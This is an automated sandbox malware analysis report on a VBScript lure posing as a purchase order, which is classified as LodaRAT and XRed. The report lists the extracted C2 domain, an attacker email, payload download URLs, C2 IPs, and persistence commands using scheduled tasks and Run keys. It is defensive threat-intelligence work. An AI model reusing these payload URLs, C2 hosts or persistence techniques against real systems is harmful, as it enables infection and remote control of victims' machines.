Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order No. G02873362-Docx.vbs

Overview

General Information

Sample name:Purchase Order No. G02873362-Docx.vbs
Analysis ID:1580572
MD5:1ab2a527d0e4bd1f76f5467d6e2ea3dc
SHA1:9731d4f1fc6d6145aa9ed5243cb07b16f17d2f98
SHA256:115cf5a051098e7bd964d660b0ebead30d851cdbd06886ee2d47007889abae48
Tags:vbsuser-malrpt
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • update.exe (PID: 5592 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
  • update.exe (PID: 3068 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
  • update.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
    • ._cache_update.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
      • cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2992 cmdline: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 4268 cmdline: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6100 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 1D45B99034D67448EBF0776BD5699C84)
  • EXCEL.EXE (PID: 4144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • NUHORT.exe (PID: 4476 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • Synaptics.exe (PID: 8008 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 1D45B99034D67448EBF0776BD5699C84)
  • NUHORT.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • ._cache_update.exe (PID: 3748 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 6556 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 5744 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security
    sslproxydump.pcapJoeSecurity_XRedYara detected XRedJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\VFNCBO.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
          C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\ProgramData\Synaptics\RCX4F1F.tmpJoeSecurity_XRedYara detected XRedJoe Security
              C:\ProgramData\Synaptics\RCX4F1F.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 6 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                  00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                          Click to see the 11 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.wscript.exe.229973aa684.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            1.0.update.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                              1.0.update.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Potentially Suspicious Malware Callback Communication
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Initiated: true, ProcessId: 3104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 3104, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, ProcessId: 4268, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 3104, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, ProcessId: 4268, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", ProcessId: 5544, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ProcessId: 3104, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VFNCBO
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3168, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ProcessId: 2992, ProcessName: schtasks.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", ProcessId: 5544, ProcessName: wscript.exe
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ProcessId: 3444, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Sigma detected: Office Macro File Creation
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6100, TargetFilename: C:\Users\user\AppData\Local\Temp\32pAPMdc.xlsm

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-25T09:07:26.099495+010020448871A Network Trojan was detected192.168.2.449740142.250.181.14443TCP
                                2024-12-25T09:07:26.108839+010020448871A Network Trojan was detected192.168.2.449741142.250.181.14443TCP
                                2024-12-25T09:07:29.864974+010020448871A Network Trojan was detected192.168.2.449755142.250.181.14443TCP
                                2024-12-25T09:07:29.870681+010020448871A Network Trojan was detected192.168.2.449754142.250.181.14443TCP
                                2024-12-25T09:07:33.922381+010020448871A Network Trojan was detected192.168.2.449766142.250.181.14443TCP
                                2024-12-25T09:07:33.923467+010020448871A Network Trojan was detected192.168.2.449767142.250.181.14443TCP
                                2024-12-25T09:07:36.539383+010020448871A Network Trojan was detected192.168.2.449774142.250.181.14443TCP
                                2024-12-25T09:07:36.549457+010020448871A Network Trojan was detected192.168.2.449772142.250.181.14443TCP
                                2024-12-25T09:07:39.666676+010020448871A Network Trojan was detected192.168.2.449784142.250.181.14443TCP
                                2024-12-25T09:07:39.667770+010020448871A Network Trojan was detected192.168.2.449783142.250.181.14443TCP
                                2024-12-25T09:07:42.341155+010020448871A Network Trojan was detected192.168.2.449790142.250.181.14443TCP
                                2024-12-25T09:07:42.357691+010020448871A Network Trojan was detected192.168.2.449788142.250.181.14443TCP
                                2024-12-25T09:07:45.370596+010020448871A Network Trojan was detected192.168.2.449801142.250.181.14443TCP
                                2024-12-25T09:07:45.373896+010020448871A Network Trojan was detected192.168.2.449800142.250.181.14443TCP
                                2024-12-25T09:07:49.392235+010020448871A Network Trojan was detected192.168.2.449811142.250.181.14443TCP
                                2024-12-25T09:07:49.395030+010020448871A Network Trojan was detected192.168.2.449810142.250.181.14443TCP
                                2024-12-25T09:07:53.384741+010020448871A Network Trojan was detected192.168.2.449821142.250.181.14443TCP
                                2024-12-25T09:07:53.456342+010020448871A Network Trojan was detected192.168.2.449822142.250.181.14443TCP
                                2024-12-25T09:07:57.371609+010020448871A Network Trojan was detected192.168.2.449831142.250.181.14443TCP
                                2024-12-25T09:07:57.376489+010020448871A Network Trojan was detected192.168.2.449832142.250.181.14443TCP
                                2024-12-25T09:08:01.386686+010020448871A Network Trojan was detected192.168.2.449852142.250.181.14443TCP
                                2024-12-25T09:08:01.399802+010020448871A Network Trojan was detected192.168.2.449851142.250.181.14443TCP
                                2024-12-25T09:08:05.407778+010020448871A Network Trojan was detected192.168.2.449870142.250.181.14443TCP
                                2024-12-25T09:08:05.417943+010020448871A Network Trojan was detected192.168.2.449871142.250.181.14443TCP
                                2024-12-25T09:08:08.014451+010020448871A Network Trojan was detected192.168.2.449883142.250.181.14443TCP
                                2024-12-25T09:08:08.015887+010020448871A Network Trojan was detected192.168.2.449880142.250.181.14443TCP
                                2024-12-25T09:08:11.117118+010020448871A Network Trojan was detected192.168.2.449897142.250.181.14443TCP
                                2024-12-25T09:08:11.123125+010020448871A Network Trojan was detected192.168.2.449896142.250.181.14443TCP
                                2024-12-25T09:08:13.705640+010020448871A Network Trojan was detected192.168.2.449904142.250.181.14443TCP
                                2024-12-25T09:08:13.726696+010020448871A Network Trojan was detected192.168.2.449907142.250.181.14443TCP
                                2024-12-25T09:08:16.807097+010020448871A Network Trojan was detected192.168.2.449926142.250.181.14443TCP
                                2024-12-25T09:08:16.816355+010020448871A Network Trojan was detected192.168.2.449925142.250.181.14443TCP
                                2024-12-25T09:08:20.795906+010020448871A Network Trojan was detected192.168.2.449944142.250.181.14443TCP
                                2024-12-25T09:08:20.803683+010020448871A Network Trojan was detected192.168.2.449945142.250.181.14443TCP
                                2024-12-25T09:08:23.394098+010020448871A Network Trojan was detected192.168.2.449954142.250.181.14443TCP
                                2024-12-25T09:08:23.397849+010020448871A Network Trojan was detected192.168.2.449955142.250.181.14443TCP
                                2024-12-25T09:08:26.507057+010020448871A Network Trojan was detected192.168.2.449969142.250.181.14443TCP
                                2024-12-25T09:08:26.510332+010020448871A Network Trojan was detected192.168.2.449970142.250.181.14443TCP
                                2024-12-25T09:08:29.350572+010020448871A Network Trojan was detected192.168.2.449981142.250.181.14443TCP
                                2024-12-25T09:08:29.434120+010020448871A Network Trojan was detected192.168.2.449983142.250.181.14443TCP
                                2024-12-25T09:08:32.207709+010020448871A Network Trojan was detected192.168.2.450001142.250.181.14443TCP
                                2024-12-25T09:08:32.221715+010020448871A Network Trojan was detected192.168.2.450002142.250.181.14443TCP
                                2024-12-25T09:08:36.200626+010020448871A Network Trojan was detected192.168.2.450019142.250.181.14443TCP
                                2024-12-25T09:08:36.204733+010020448871A Network Trojan was detected192.168.2.450020142.250.181.14443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-25T09:07:27.246476+010028221161Malware Command and Control Activity Detected192.168.2.449753172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-25T09:08:14.243532+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                                2024-12-25T09:08:54.743495+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-25T09:07:25.916571+010028326171Malware Command and Control Activity Detected192.168.2.44974569.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-25T09:06:59.825228+010028498851Malware Command and Control Activity Detected192.168.2.449753172.111.138.1005552TCP
                                2024-12-25T09:07:27.246476+010028498851Malware Command and Control Activity Detected192.168.2.449753172.111.138.1005552TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\ProgramData\Synaptics\RCX4F1F.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCX4F1F.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: 0.3.wscript.exe.229973aa684.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\Synaptics\RCX4F1F.tmpReversingLabs: Detection: 100%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 100%
                                Multi AV Scanner detection for submitted file
                                Source: Purchase Order No. G02873362-Docx.vbsVirustotal: Detection: 37%Perma Link
                                Source: Purchase Order No. G02873362-Docx.vbsReversingLabs: Detection: 28%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
                                Machine Learning detection for dropped file
                                Source: C:\ProgramData\Synaptics\RCX4F1F.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49755 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49754 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49766 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49767 version: TLS 1.2
